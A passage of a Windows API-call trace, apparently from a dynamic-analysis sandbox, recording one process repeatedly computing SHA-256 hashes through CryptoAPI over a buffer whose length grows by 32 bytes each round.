	[0191.361] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.361] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300c80
	[0191.361] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300c80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300c80, pdwDataLen=0x1283b0) returned 1
	[0191.361] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.361] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.361] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.361] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.361] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0191.361] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.362] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300ca8
	[0191.362] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300ca8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300ca8, pdwDataLen=0x1283b0) returned 1
	[0191.362] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.362] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.362] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.362] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.362] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0191.362] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.362] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300cd0
	[0191.362] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300cd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300cd0, pdwDataLen=0x1283b0) returned 1
	[0191.362] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.362] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.362] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.363] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.363] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0191.363] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.363] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300cf8
	[0191.363] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300cf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300cf8, pdwDataLen=0x1283b0) returned 1
	[0191.363] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.363] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.363] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.363] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.363] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0191.363] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.363] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300d20
	[0191.363] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300d20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300d20, pdwDataLen=0x1283b0) returned 1
	[0191.363] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.363] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.363] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.364] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.364] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0191.364] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.364] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300d48
	[0191.364] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300d48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300d48, pdwDataLen=0x1283b0) returned 1
	[0191.364] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.364] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.364] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.364] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.364] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0191.364] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.364] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300d70
	[0191.364] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300d70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300d70, pdwDataLen=0x1283b0) returned 1
	[0191.364] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.364] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.364] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.365] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.365] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0191.365] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.365] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300d98
	[0191.365] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300d98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300d98, pdwDataLen=0x1283b0) returned 1
	[0191.365] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.365] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.365] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.365] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.365] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0191.365] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.366] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300dc0
	[0191.366] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300dc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300dc0, pdwDataLen=0x1283b0) returned 1
	[0191.366] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.366] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.366] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.366] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.366] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0191.366] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.366] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300de8
	[0191.366] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300de8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300de8, pdwDataLen=0x1283b0) returned 1
	[0191.366] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.366] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.366] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.367] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.367] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0191.367] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.367] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300e10
	[0191.367] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300e10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300e10, pdwDataLen=0x1283b0) returned 1
	[0191.367] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.367] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.367] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.367] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.367] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0191.367] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.367] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300e38
	[0191.367] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300e38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300e38, pdwDataLen=0x1283b0) returned 1
	[0191.367] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.367] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.367] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.368] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.368] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0191.368] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300e60
	[0191.368] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300e60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300e60, pdwDataLen=0x1283b0) returned 1
	[0191.368] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.368] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.368] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.368] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.368] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0191.368] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300e88
	[0191.368] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300e88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300e88, pdwDataLen=0x1283b0) returned 1
	[0191.369] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.369] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.369] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.369] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.369] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0191.369] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.369] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300eb0
	[0191.369] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300eb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300eb0, pdwDataLen=0x1283b0) returned 1
	[0191.369] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.369] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.369] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.370] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.370] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0191.370] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300ed8
	[0191.370] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300ed8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300ed8, pdwDataLen=0x1283b0) returned 1
	[0191.370] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.370] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.370] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.370] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.370] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0191.370] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300f00
	[0191.370] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300f00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300f00, pdwDataLen=0x1283b0) returned 1
	[0191.370] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.370] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.370] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.371] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.371] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0191.371] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.371] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300f28
	[0191.371] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300f28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300f28, pdwDataLen=0x1283b0) returned 1
	[0191.371] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.371] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.371] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.371] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.371] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0191.371] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.371] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300f50
	[0191.371] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300f50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300f50, pdwDataLen=0x1283b0) returned 1
	[0191.371] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.371] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.371] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.372] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.372] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0191.372] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.372] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300f78
	[0191.372] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300f78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300f78, pdwDataLen=0x1283b0) returned 1
	[0191.372] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.372] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.372] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.372] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.372] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0191.373] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.373] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300fa0
	[0191.373] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300fa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300fa0, pdwDataLen=0x1283b0) returned 1
	[0191.373] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.373] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.373] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.373] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.373] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0191.373] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.373] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300fc8
	[0191.373] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300fc8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300fc8, pdwDataLen=0x1283b0) returned 1
	[0191.373] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.373] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.373] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.374] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.374] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0191.374] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.374] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300ff0
	[0191.374] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300ff0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300ff0, pdwDataLen=0x1283b0) returned 1
	[0191.374] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.374] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.374] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.374] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.374] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0191.374] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.374] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301018
	[0191.374] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301018, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301018, pdwDataLen=0x1283b0) returned 1
	[0191.374] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.374] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.374] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.375] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.375] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0191.375] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301040
	[0191.375] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301040, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301040, pdwDataLen=0x1283b0) returned 1
	[0191.375] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.375] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.375] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.375] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.375] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0191.375] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
